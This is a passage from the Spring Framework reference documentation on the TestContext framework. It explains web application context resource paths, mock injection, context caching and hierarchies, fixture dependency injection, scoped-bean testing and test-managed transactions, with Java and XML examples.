`@Configuration` classes).\n\n.Default resource semantics\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ file system resource\n\t@WebAppConfiguration(\"webapp\")\n\n\t\/\/ classpath resource\n\t@ContextConfiguration(\"\/spring\/test-servlet-config.xml\")\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nThis example demonstrates how to explicitly declare a resource base path with\n`@WebAppConfiguration` and an XML resource location with `@ContextConfiguration`. The\nimportant thing to note here is the different semantics for paths with these two\nannotations. By default, `@WebAppConfiguration` resource paths are file system based;\nwhereas, `@ContextConfiguration` resource locations are classpath based.\n\n.Explicit resource semantics\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ classpath resource\n\t@WebAppConfiguration(\"classpath:test-web-resources\")\n\n\t\/\/ file system resource\n\t@ContextConfiguration(\"file:src\/main\/webapp\/WEB-INF\/servlet-config.xml\")\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nIn this third example, we see that we can override the default resource semantics for\nboth annotations by specifying a Spring resource prefix. Contrast the comments in this\nexample with the previous example.\n\n.[[testcontext-ctx-management-web-mocks]]Working with Web Mocks\n--\nTo provide comprehensive web testing support, Spring 3.2 introduced a\n`ServletTestExecutionListener` that is enabled by default. When testing against a\n`WebApplicationContext` this <<testcontext-key-abstractions,TestExecutionListener>> sets\nup default thread-local state via Spring Web's `RequestContextHolder` before each test\nmethod and creates a `MockHttpServletRequest`, `MockHttpServletResponse`, and\n`ServletWebRequest` based on the base resource path configured via\n`@WebAppConfiguration`. 
`ServletTestExecutionListener` also ensures that the\n`MockHttpServletResponse` and `ServletWebRequest` can be injected into the test\ninstance, and once the test is complete it cleans up thread-local state.\n\nOnce you have a `WebApplicationContext` loaded for your test you might find that you\nneed to interact with the web mocks -- for example, to set up your test fixture or to\nperform assertions after invoking your web component. The following example demonstrates\nwhich mocks can be autowired into your test instance. Note that the\n`WebApplicationContext` and `MockServletContext` are both cached across the test suite;\nwhereas, the other mocks are managed per test method by the\n`ServletTestExecutionListener`.\n\n.Injecting mocks\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@WebAppConfiguration\n\t@ContextConfiguration\n\tpublic class WacTests {\n\n\t\t@Autowired\n\t\tWebApplicationContext wac; \/\/ cached\n\n\t\t@Autowired\n\t\tMockServletContext servletContext; \/\/ cached\n\n\t\t@Autowired\n\t\tMockHttpSession session;\n\n\t\t@Autowired\n\t\tMockHttpServletRequest request;\n\n\t\t@Autowired\n\t\tMockHttpServletResponse response;\n\n\t\t@Autowired\n\t\tServletWebRequest webRequest;\n\n\t\t\/\/...\n\t}\n----\n--\n\n[[testcontext-ctx-management-caching]]\n===== Context caching\n\nOnce the TestContext framework loads an `ApplicationContext` (or `WebApplicationContext`)\nfor a test, that context will be cached and reused for __all__ subsequent tests that\ndeclare the same unique context configuration within the same test suite. To understand\nhow caching works, it is important to understand what is meant by __unique__ and __test\nsuite__.\n\nAn `ApplicationContext` can be __uniquely__ identified by the combination of\nconfiguration parameters that are used to load it. Consequently, the unique combination\nof configuration parameters are used to generate a __key__ under which the context is\ncached. The TestContext framework uses the following configuration parameters to build\nthe context cache key:\n\n* `locations` __(from @ContextConfiguration)__\n* `classes` __(from @ContextConfiguration)__\n* `contextInitializerClasses` __(from @ContextConfiguration)__\n* `contextLoader` __(from @ContextConfiguration)__\n* `parent` __(from @ContextHierarchy)__\n* `activeProfiles` __(from @ActiveProfiles)__\n* `propertySourceLocations` __(from @TestPropertySource)__\n* `propertySourceProperties` __(from @TestPropertySource)__\n* `resourceBasePath` __(from @WebAppConfiguration)__\n\nFor example, if `TestClassA` specifies `{\"app-config.xml\", \"test-config.xml\"}` for the\n`locations` (or `value`) attribute of `@ContextConfiguration`, the TestContext framework\nwill load the corresponding `ApplicationContext` and store it in a `static` context cache\nunder a key that is based solely on those locations. So if `TestClassB` also defines\n`{\"app-config.xml\", \"test-config.xml\"}` for its locations (either explicitly or\nimplicitly through inheritance) but does not define `@WebAppConfiguration`, a different\n`ContextLoader`, different active profiles, different context initializers, different\ntest property sources, or a different parent context, then the same `ApplicationContext`\nwill be shared by both test classes. 
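A minimal sketch of that scenario looks like this (both test classes are hypothetical):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration({\"app-config.xml\", \"test-config.xml\"})\n\tpublic class TestClassA {\n\t\t\/\/ class body...\n\t}\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ same locations, so the context cached for TestClassA is reused\n\t@ContextConfiguration({\"app-config.xml\", \"test-config.xml\"})\n\tpublic class TestClassB {\n\t\t\/\/ class body...\n\t}\n----\n\n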
This means that the setup cost for loading an\napplication context is incurred only once (per test suite), and subsequent test execution\nis much faster.\n\n.Test suites and forked processes\n[NOTE]\n====\nThe Spring TestContext framework stores application contexts in a __static__ cache. This\nmeans that the context is literally stored in a `static` variable. In other words, if\ntests execute in separate processes the static cache will be cleared between each test\nexecution, and this will effectively disable the caching mechanism.\n\nTo benefit from the caching mechanism, all tests must run within the same process or\ntest suite. This can be achieved by executing all tests as a group within an IDE.\nSimilarly, when executing tests with a build framework such as Ant, Maven, or Gradle it\nis important to make sure that the build framework does not __fork__ between tests. For\nexample, if the\nhttp:\/\/maven.apache.org\/plugins\/maven-surefire-plugin\/test-mojo.html#forkMode[forkMode]\nfor the Maven Surefire plug-in is set to `always` or `pertest`, the TestContext\nframework will not be able to cache application contexts between test classes and the\nbuild process will run significantly slower as a result.\n====\n\nSince having a large number of application contexts loaded within a given test suite can\ncause the suite to take an unnecessarily long time to execute, it is often beneficial to\nknow exactly how many contexts have been loaded and cached. To view the statistics for\nthe underlying context cache, simply set the log level for the\n`org.springframework.test.context.cache` logging category to `DEBUG`.\n\nIn the unlikely case that a test corrupts the application context and requires reloading\n-- for example, by modifying a bean definition or the state of an application object --\nyou can annotate your test class or test method with `@DirtiesContext` (see the\ndiscussion of `@DirtiesContext` in <<integration-testing-annotations-spring>>). This\ninstructs Spring to remove the context from the cache and rebuild the application\ncontext before executing the next test. Note that support for the `@DirtiesContext`\nannotation is provided by the `DirtiesContextBeforeModesTestExecutionListener` and the\n`DirtiesContextTestExecutionListener` which are enabled by default.\n\n\n[[testcontext-ctx-management-ctx-hierarchies]]\n===== Context hierarchies\n\nWhen writing integration tests that rely on a loaded Spring `ApplicationContext`, it is\noften sufficient to test against a single context; however, there are times when it is\nbeneficial or even necessary to test against a hierarchy of ++ApplicationContext++s. For\nexample, if you are developing a Spring MVC web application you will typically have a\nroot `WebApplicationContext` loaded via Spring's `ContextLoaderListener` and a child\n`WebApplicationContext` loaded via Spring's `DispatcherServlet`. This results in a\nparent-child context hierarchy where shared components and infrastructure configuration\nare declared in the root context and consumed in the child context by web-specific\ncomponents. 
Another use case can be found in Spring Batch applications where you often\nhave a parent context that provides configuration for shared batch infrastructure and a\nchild context for the configuration of a specific batch job.\n\nAs of Spring Framework 3.2.2, it is possible to write integration tests that use context\nhierarchies by declaring context configuration via the `@ContextHierarchy` annotation,\neither on an individual test class or within a test class hierarchy. If a context\nhierarchy is declared on multiple classes within a test class hierarchy it is also\npossible to merge or override the context configuration for a specific, named level in\nthe context hierarchy. When merging configuration for a given level in the hierarchy the\nconfiguration resource type (i.e., XML configuration files or annotated classes) must be\nconsistent; otherwise, it is perfectly acceptable to have different levels in a context\nhierarchy configured using different resource types.\n\nThe following JUnit-based examples demonstrate common configuration scenarios for\nintegration tests that require the use of context hierarchies.\n\n.Single test class with context hierarchy\n--\n`ControllerIntegrationTests` represents a typical integration testing scenario for a\nSpring MVC web application by declaring a context hierarchy consisting of two levels,\none for the __root__ WebApplicationContext (loaded using the `TestAppConfig`\n`@Configuration` class) and one for the __dispatcher servlet__ `WebApplicationContext`\n(loaded using the `WebConfig` `@Configuration` class). The `WebApplicationContext` that\nis __autowired__ into the test instance is the one for the child context (i.e., the\nlowest context in the hierarchy).\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(classes = TestAppConfig.class),\n\t\t@ContextConfiguration(classes = WebConfig.class)\n\t})\n\tpublic class ControllerIntegrationTests {\n\n\t\t@Autowired\n\t\tprivate WebApplicationContext wac;\n\n\t\t\/\/ ...\n\t}\n----\n\n--\n\n\n.Class hierarchy with implicit parent context\n--\nThe following test classes define a context hierarchy within a test class hierarchy.\n`AbstractWebTests` declares the configuration for a root `WebApplicationContext` in a\nSpring-powered web application. Note, however, that `AbstractWebTests` does not declare\n`@ContextHierarchy`; consequently, subclasses of `AbstractWebTests` can optionally\nparticipate in a context hierarchy or simply follow the standard semantics for\n`@ContextConfiguration`. `SoapWebServiceTests` and `RestWebServiceTests` both extend\n`AbstractWebTests` and define a context hierarchy via `@ContextHierarchy`. 
The result is\nthat three application contexts will be loaded (one for each declaration of\n`@ContextConfiguration`), and the application context loaded based on the configuration\nin `AbstractWebTests` will be set as the parent context for each of the contexts loaded\nfor the concrete subclasses.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextConfiguration(\"file:src\/main\/webapp\/WEB-INF\/applicationContext.xml\")\n\tpublic abstract class AbstractWebTests {}\n\n\t@ContextHierarchy(@ContextConfiguration(\"\/spring\/soap-ws-config.xml\"))\n\tpublic class SoapWebServiceTests extends AbstractWebTests {}\n\n\t@ContextHierarchy(@ContextConfiguration(\"\/spring\/rest-ws-config.xml\"))\n\tpublic class RestWebServiceTests extends AbstractWebTests {}\n----\n--\n\n\n.Class hierarchy with merged context hierarchy configuration\n--\nThe following classes demonstrate the use of __named__ hierarchy levels in order to\n__merge__ the configuration for specific levels in a context hierarchy. `BaseTests`\ndefines two levels in the hierarchy, `parent` and `child`. `ExtendedTests` extends\n`BaseTests` and instructs the Spring TestContext Framework to merge the context\nconfiguration for the `child` hierarchy level, simply by ensuring that the names\ndeclared via the `name` attribute in `@ContextConfiguration` are both `\"child\"`. The\nresult is that three application contexts will be loaded: one for `\"\/app-config.xml\"`,\none for `\"\/user-config.xml\"`, and one for `{\"\/user-config.xml\", \"\/order-config.xml\"}`.\nAs with the previous example, the application context loaded from `\"\/app-config.xml\"`\nwill be set as the parent context for the contexts loaded from `\"\/user-config.xml\"`\nand `{\"\/user-config.xml\", \"\/order-config.xml\"}`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(name = \"parent\", locations = \"\/app-config.xml\"),\n\t\t@ContextConfiguration(name = \"child\", locations = \"\/user-config.xml\")\n\t})\n\tpublic class BaseTests {}\n\n\t@ContextHierarchy(\n\t\t@ContextConfiguration(name = \"child\", locations = \"\/order-config.xml\")\n\t)\n\tpublic class ExtendedTests extends BaseTests {}\n----\n--\n\n.Class hierarchy with overridden context hierarchy configuration\n--\nIn contrast to the previous example, this example demonstrates how to __override__ the\nconfiguration for a given named level in a context hierarchy by setting the\n`inheritLocations` flag in `@ContextConfiguration` to `false`. 
Consequently, the\napplication context for `ExtendedTests` will be loaded only from\n`\"\/test-user-config.xml\"` and will have its parent set to the context loaded from\n`\"\/app-config.xml\"`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(name = \"parent\", locations = \"\/app-config.xml\"),\n\t\t@ContextConfiguration(name = \"child\", locations = \"\/user-config.xml\")\n\t})\n\tpublic class BaseTests {}\n\n\t@ContextHierarchy(\n\t\t@ContextConfiguration(\n\t\t\tname = \"child\",\n\t\t\tlocations = \"\/test-user-config.xml\",\n\t\t\tinheritLocations = false\n\t))\n\tpublic class ExtendedTests extends BaseTests {}\n----\n\n.Dirtying a context within a context hierarchy\n[NOTE]\n====\nIf `@DirtiesContext` is used in a test whose context is configured as part of a context\nhierarchy, the `hierarchyMode` flag can be used to control how the context cache is\ncleared. For further details consult the discussion of `@DirtiesContext` in\n<<integration-testing-annotations-spring,Spring Testing Annotations>> and the\n`@DirtiesContext` javadocs.\n====\n--\n\n\n[[testcontext-fixture-di]]\n==== Dependency injection of test fixtures\nWhen you use the `DependencyInjectionTestExecutionListener` -- which is configured by\ndefault -- the dependencies of your test instances are __injected__ from beans in the\napplication context that you configured with `@ContextConfiguration`. You may use setter\ninjection, field injection, or both, depending on which annotations you choose and\nwhether you place them on setter methods or fields. For consistency with the annotation\nsupport introduced in Spring 2.5 and 3.0, you can use Spring's `@Autowired` annotation\nor the `@Inject` annotation from JSR 330.\n\n[TIP]\n====\n\nThe TestContext framework does not instrument the manner in which a test instance is\ninstantiated. Thus the use of `@Autowired` or `@Inject` for constructors has no effect\nfor test classes.\n====\n\nBecause `@Autowired` is used to perform <<beans-factory-autowire, __autowiring by type__\n>>, if you have multiple bean definitions of the same type, you cannot rely on this\napproach for those particular beans. In that case, you can use `@Autowired` in\nconjunction with `@Qualifier`. As of Spring 3.0 you may also choose to use `@Inject` in\nconjunction with `@Named`. Alternatively, if your test class has access to its\n`ApplicationContext`, you can perform an explicit lookup by using (for example) a call\nto `applicationContext.getBean(\"titleRepository\")`.\n\nIf you do not want dependency injection applied to your test instances, simply do not\nannotate fields or setter methods with `@Autowired` or `@Inject`. Alternatively, you can\ndisable dependency injection altogether by explicitly configuring your class with\n`@TestExecutionListeners` and omitting `DependencyInjectionTestExecutionListener.class`\nfrom the list of listeners.\n\nConsider the scenario of testing a `HibernateTitleRepository` class, as outlined in the\n<<integration-testing-goals,Goals>> section. The next two code listings demonstrate the\nuse of `@Autowired` on fields and setter methods. The application context configuration\nis presented after all sample code listings.\n\n[NOTE]\n====\nThe dependency injection behavior in the following code listings is not specific to\nJUnit. 
The same DI techniques can be used in conjunction with any testing framework.\n\nThe following examples make calls to static assertion methods such as `assertNotNull()`\nbut without prepending the call with `Assert`. In such cases, assume that the method was\nproperly imported through an `import static` declaration that is not shown in the\nexample.\n====\n\nThe first code listing shows a JUnit-based implementation of the test class that uses\n`@Autowired` for field injection.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ specifies the Spring configuration to load for this test fixture\n\t**@ContextConfiguration(\"repository-config.xml\")**\n\tpublic class HibernateTitleRepositoryTests {\n\n\t\t\/\/ this instance will be dependency injected by type\n\t\t**@Autowired**\n\t\tprivate HibernateTitleRepository titleRepository;\n\n\t\t@Test\n\t\tpublic void findById() {\n\t\t\tTitle title = titleRepository.findById(new Long(10));\n\t\t\tassertNotNull(title);\n\t\t}\n\t}\n----\n\nAlternatively, you can configure the class to use `@Autowired` for setter injection as\nseen below.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ specifies the Spring configuration to load for this test fixture\n\t**@ContextConfiguration(\"repository-config.xml\")**\n\tpublic class HibernateTitleRepositoryTests {\n\n\t\t\/\/ this instance will be dependency injected by type\n\t\tprivate HibernateTitleRepository titleRepository;\n\n\t\t**@Autowired**\n\t\tpublic void setTitleRepository(HibernateTitleRepository titleRepository) {\n\t\t\tthis.titleRepository = titleRepository;\n\t\t}\n\n\t\t@Test\n\t\tpublic void findById() {\n\t\t\tTitle title = titleRepository.findById(new Long(10));\n\t\t\tassertNotNull(title);\n\t\t}\n\t}\n----\n\nThe preceding code listings use the same XML context file referenced by the\n`@ContextConfiguration` annotation (that is, `repository-config.xml`), which looks like\nthis:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<!-- this bean will be injected into the HibernateTitleRepositoryTests class -->\n\t\t<bean id=\"**titleRepository**\" class=\"**com.foo.repository.hibernate.HibernateTitleRepository**\">\n\t\t\t<property name=\"sessionFactory\" ref=\"sessionFactory\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"sessionFactory\" class=\"org.springframework.orm.hibernate5.LocalSessionFactoryBean\">\n\t\t\t<!-- configuration elided for brevity -->\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\n[NOTE]\n====\nIf you are extending from a Spring-provided test base class that happens to use\n`@Autowired` on one of its setter methods, you might have multiple beans of the affected\ntype defined in your application context: for example, multiple `DataSource` beans. 
In\nsuch a case, you can override the setter method and use the `@Qualifier` annotation to\nindicate a specific target bean as follows, but make sure to delegate to the overridden\nmethod in the superclass as well.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ ...\n\n\t\t@Autowired\n\t\t@Override\n\t\tpublic void setDataSource(**@Qualifier(\"myDataSource\")** DataSource dataSource) {\n\t\t\t**super**.setDataSource(dataSource);\n\t\t}\n\n\t\/\/ ...\n----\n\nThe specified qualifier value indicates the specific `DataSource` bean to inject,\nnarrowing the set of type matches to a specific bean. Its value is matched against\n`<qualifier>` declarations within the corresponding `<bean>` definitions. The bean name\nis used as a fallback qualifier value, so you may effectively also point to a specific\nbean by name there (as shown above, assuming that \"myDataSource\" is the bean id).\n====\n\n\n[[testcontext-web-scoped-beans]]\n==== Testing request and session scoped beans\n\n<<beans-factory-scopes-other,Request and session scoped beans>> have been supported by\nSpring for several years now, but it's always been a bit non-trivial to test them. As of\nSpring 3.2 it's a breeze to test your request-scoped and session-scoped beans by\nfollowing these steps.\n\n* Ensure that a `WebApplicationContext` is loaded for your test by annotating your test\n class with `@WebAppConfiguration`.\n* Inject the mock request or session into your test instance and prepare your test\n fixture as appropriate.\n* Invoke your web component that you retrieved from the configured\n `WebApplicationContext` (i.e., via dependency injection).\n* Perform assertions against the mocks.\n\nThe following code snippet displays the XML configuration for a login use case. Note\nthat the `userService` bean has a dependency on a request-scoped `loginAction` bean.\nAlso, the `LoginAction` is instantiated using <<expressions,SpEL expressions>> that\nretrieve the username and password from the current HTTP request. In our test, we will\nwant to configure these request parameters via the mock managed by the TestContext\nframework.\n\n.Request-scoped bean configuration\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\n\t\t<bean id=\"userService\"\n\t\t\t\tclass=\"com.example.SimpleUserService\"\n\t\t\t\tc:loginAction-ref=\"loginAction\" \/>\n\n\t\t<bean id=\"loginAction\" class=\"com.example.LoginAction\"\n\t\t\t\tc:username=\"#{request.getParameter('user')}\"\n\t\t\t\tc:password=\"#{request.getParameter('pswd')}\"\n\t\t\t\tscope=\"request\">\n\t\t\t<aop:scoped-proxy \/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\nIn `RequestScopedBeanTests` we inject both the `UserService` (i.e., the subject under\ntest) and the `MockHttpServletRequest` into our test instance. Within our\n`requestScope()` test method we set up our test fixture by setting request parameters in\nthe provided `MockHttpServletRequest`. When the `loginUser()` method is invoked on our\n`userService` we are assured that the user service has access to the request-scoped\n`loginAction` for the current `MockHttpServletRequest` (i.e., the one we just set\nparameters in). 
We can then perform assertions against the results based on the known\ninputs for the username and password.\n\n.Request-scoped bean test\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t@WebAppConfiguration\n\tpublic class RequestScopedBeanTests {\n\n\t\t@Autowired UserService userService;\n\t\t@Autowired MockHttpServletRequest request;\n\n\t\t@Test\n\t\tpublic void requestScope() {\n\n\t\t\trequest.setParameter(\"user\", \"enigma\");\n\t\t\trequest.setParameter(\"pswd\", \"$pr!ng\");\n\n\t\t\tLoginResults results = userService.loginUser();\n\n\t\t\t\/\/ assert results\n\t\t}\n\t}\n----\n\nThe following code snippet is similar to the one we saw above for a request-scoped bean;\nhowever, this time the `userService` bean has a dependency on a session-scoped\n`userPreferences` bean. Note that the `UserPreferences` bean is instantiated using a\nSpEL expression that retrieves the __theme__ from the current HTTP session. In our test,\nwe will need to configure a theme in the mock session managed by the TestContext\nframework.\n\n.Session-scoped bean configuration\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\n\t\t<bean id=\"userService\"\n\t\t\t\tclass=\"com.example.SimpleUserService\"\n\t\t\t\tc:userPreferences-ref=\"userPreferences\" \/>\n\n\t\t<bean id=\"userPreferences\"\n\t\t\t\tclass=\"com.example.UserPreferences\"\n\t\t\t\tc:theme=\"#{session.getAttribute('theme')}\"\n\t\t\t\tscope=\"session\">\n\t\t\t<aop:scoped-proxy \/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\nIn `SessionScopedBeanTests` we inject the `UserService` and the `MockHttpSession` into\nour test instance. Within our `sessionScope()` test method we set up our test fixture by\nsetting the expected \"theme\" attribute in the provided `MockHttpSession`. When the\n`processUserPreferences()` method is invoked on our `userService` we are assured that\nthe user service has access to the session-scoped `userPreferences` for the current\n`MockHttpSession`, and we can perform assertions against the results based on the\nconfigured theme.\n\n.Session-scoped bean test\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t@WebAppConfiguration\n\tpublic class SessionScopedBeanTests {\n\n\t\t@Autowired UserService userService;\n\t\t@Autowired MockHttpSession session;\n\n\t\t@Test\n\t\tpublic void sessionScope() throws Exception {\n\n\t\t\tsession.setAttribute(\"theme\", \"blue\");\n\n\t\t\tResults results = userService.processUserPreferences();\n\n\t\t\t\/\/ assert results\n\t\t}\n\t}\n----\n\n[[testcontext-tx]]\n==== Transaction management\n\nIn the TestContext framework, transactions are managed by the\n`TransactionalTestExecutionListener` which is configured by default, even if you do not\nexplicitly declare `@TestExecutionListeners` on your test class. To enable support for\ntransactions, however, you must configure a `PlatformTransactionManager` bean in the\n`ApplicationContext` that is loaded via `@ContextConfiguration` semantics (further\ndetails are provided below). In addition, you must declare Spring's `@Transactional`\nannotation either at the class or method level for your tests.\n\n[[testcontext-tx-test-managed-transactions]]\n===== Test-managed transactions\n\n_Test-managed transactions_ are transactions that are managed _declaratively_ via the\n`TransactionalTestExecutionListener` or _programmatically_ via `TestTransaction` (see\nbelow). 
Such transactions should not be confused with _Spring-managed transactions_\n(i.e., those managed directly by Spring within the `ApplicationContext` loaded for tests)\nor _application-managed transactions_ (i.e., those managed programmatically within\napplication code that is invoked via tests). Spring-managed and application-managed\ntransactions will typically participate in test-managed transactions; however, caution\nshould be taken if Spring-managed or application-managed transactions are configured with\nany _propagation_ type other than `REQUIRED` or `SUPPORTS` (see the discussion on\n<<tx-propagation,transaction propagation>> for details).\n\n[[testcontext-tx-enabling-transactions]]\n===== Enabling and disabling transactions\n\nAnnotating a test method with `@Transactional` causes the test to be run within a\ntransaction that will, by default, be automatically rolled back after completion of the\ntest. If a test class is annotated with `@Transactional`, each test method within that\nclass hierarchy will be run within a transaction. Test methods that are not annotated\nwith `@Transactional` (at the class or method level) will not be run within a\ntransaction. Furthermore, tests that are annotated with `@Transactional` but have the\n`propagation` type set to `NOT_SUPPORTED` will not be run within a transaction.\n\n__Note that <<testcontext-support-classes-junit4,\n`AbstractTransactionalJUnit4SpringContextTests`>> and\n<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>\nare preconfigured for transactional support at the class level.__\n\nThe following example demonstrates a common scenario for writing an integration test for\na Hibernate-based `UserRepository`. As explained in\n<<testcontext-tx-rollback-and-commit-behavior>>, there is no need to clean up the\ndatabase after the `createUser()` method is executed since any changes made to the\ndatabase will be automatically rolled back by the `TransactionalTestExecutionListener`.\nSee <<testing-examples-petclinic>> for an additional example.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = TestConfig.class)\n\t@Transactional\n\tpublic class HibernateUserRepositoryTests {\n\n\t\t@Autowired\n\t\tHibernateUserRepository repository;\n\n\t\t@Autowired\n\t\tSessionFactory sessionFactory;\n\n\t\tJdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tpublic void setDataSource(DataSource dataSource) {\n\t\t\tthis.jdbcTemplate = new JdbcTemplate(dataSource);\n\t\t}\n\n\t\t@Test\n\t\tpublic void createUser() {\n\t\t\t\/\/ track initial state in test database:\n\t\t\tfinal int count = countRowsInTable(\"user\");\n\n\t\t\tUser user = new User(...);\n\t\t\trepository.save(user);\n\n\t\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\t\tsessionFactory.getCurrentSession().flush();\n\t\t\tassertNumUsers(count + 1);\n\t\t}\n\n\t\tprotected int countRowsInTable(String tableName) {\n\t\t\treturn JdbcTestUtils.countRowsInTable(this.jdbcTemplate, tableName);\n\t\t}\n\n\t\tprotected void assertNumUsers(int expected) {\n\t\t\tassertEquals(\"Number of rows in the [user] table.\", expected, countRowsInTable(\"user\"));\n\t\t}\n\t}\n----\n\n[[testcontext-tx-rollback-and-commit-behavior]]\n===== Transaction rollback and commit behavior\n\nBy default, test transactions will be automatically rolled back after completion of the\ntest; however, transactional commit and rollback behavior can be configured declaratively\nvia the `@Commit` and 
`@Rollback` annotations. See the corresponding entries in the\n<<integration-testing-annotations,annotation support>> section for further details.\n\n[[testcontext-tx-programmatic-tx-mgt]]\n===== Programmatic transaction management\nAs of Spring Framework 4.1, it is possible to interact with test-managed transactions\n_programmatically_ via the static methods in `TestTransaction`. For example,\n`TestTransaction` may be used within _test_ methods, _before_ methods, and _after_\nmethods to start or end the current test-managed transaction or to configure the current\ntest-managed transaction for rollback or commit. Support for `TestTransaction` is\nautomatically available whenever the `TransactionalTestExecutionListener` is enabled.\n\nThe following example demonstrates some of the features of `TestTransaction`. Consult the\njavadocs for `TestTransaction` for further details.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration(classes = TestConfig.class)\n\tpublic class ProgrammaticTransactionManagementTests extends\n\t\t\tAbstractTransactionalJUnit4SpringContextTests {\n\t\n\t\t@Test\n\t\tpublic void transactionalTest() {\n\t\t\t\/\/ assert initial state in test database:\n\t\t\tassertNumUsers(2);\n\n\t\t\tdeleteFromTables(\"user\");\n\n\t\t\t\/\/ changes to the database will be committed!\n\t\t\tTestTransaction.flagForCommit();\n\t\t\tTestTransaction.end();\n\t\t\tassertFalse(TestTransaction.isActive());\n\t\t\tassertNumUsers(0);\n\n\t\t\tTestTransaction.start();\n\t\t\t\/\/ perform other actions against the database that will\n\t\t\t\/\/ be automatically rolled back after the test completes...\n\t\t}\n\n\t\tprotected void assertNumUsers(int expected) {\n\t\t\tassertEquals(\"Number of rows in the [user] table.\", expected, countRowsInTable(\"user\"));\n\t\t}\n\t}\n----\n\n[[testcontext-tx-before-and-after-tx]]\n===== Executing code outside of a transaction\n\nOccasionally you need to execute certain code before or after a transactional test method\nbut outside the transactional context -- for example, to verify the initial database state\nprior to execution of your test or to verify expected transactional commit behavior after\ntest execution (if the test was configured not to roll back the transaction).\n`TransactionalTestExecutionListener` supports the `@BeforeTransaction` and\n`@AfterTransaction` annotations exactly for such scenarios. Simply annotate any `void`\nmethod in your test class with one of these annotations, and the\n`TransactionalTestExecutionListener` ensures that your __before transaction method__ or\n__after transaction method__ is executed at the appropriate time.\n\n[TIP]\n====\nAny __before methods__ (such as methods annotated with JUnit's `@Before`) and any __after\nmethods__ (such as methods annotated with JUnit's `@After`) are executed __within__ a\ntransaction. In addition, methods annotated with `@BeforeTransaction` or\n`@AfterTransaction` are naturally not executed for test methods that are not configured\nto run within a transaction.\n====\n\n[[testcontext-tx-mgr-config]]\n===== Configuring a transaction manager\n\n`TransactionalTestExecutionListener` expects a `PlatformTransactionManager` bean to be\ndefined in the Spring `ApplicationContext` for the test. 
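For example, a minimal sketch of a test configuration class that satisfies this
requirement (the embedded database and the `schema.sql` script are illustrative
assumptions, not requirements of the listener):

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Configuration
	public class TestConfig {

		@Bean
		public DataSource dataSource() {
			// an embedded database is assumed here purely for illustration
			return new EmbeddedDatabaseBuilder()
					.generateUniqueName(true)
					.addScript("classpath:schema.sql") // hypothetical schema script
					.build();
		}

		@Bean
		public PlatformTransactionManager transactionManager(DataSource dataSource) {
			// the transaction manager bean that the listener will use
			return new DataSourceTransactionManager(dataSource);
		}
	}
----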
In case there are multiple\ninstances of `PlatformTransactionManager` within the test's `ApplicationContext`, a\n_qualifier_ may be declared via `@Transactional(\"myTxMgr\")` or\n`@Transactional(transactionManager = \"myTxMgr\")`, or `TransactionManagementConfigurer`\ncan be implemented by an `@Configuration` class. Consult the javadocs for\n`TestContextTransactionUtils.retrieveTransactionManager()` for details on the algorithm\nused to look up a transaction manager in the test's `ApplicationContext`.\n\n[[testcontext-tx-annotation-demo]]\n===== Demonstration of all transaction-related annotations\n\nThe following JUnit-based example displays a fictitious integration testing scenario\nhighlighting all transaction-related annotations. The example is **not** intended to\ndemonstrate best practices but rather to demonstrate how these annotations can be used.\nConsult the <<integration-testing-annotations,annotation support>> section for further\ninformation and configuration examples. <<testcontext-executing-sql-declaratively-tx,\nTransaction management for `@Sql`>> contains an additional example using `@Sql` for\ndeclarative SQL script execution with default transaction rollback 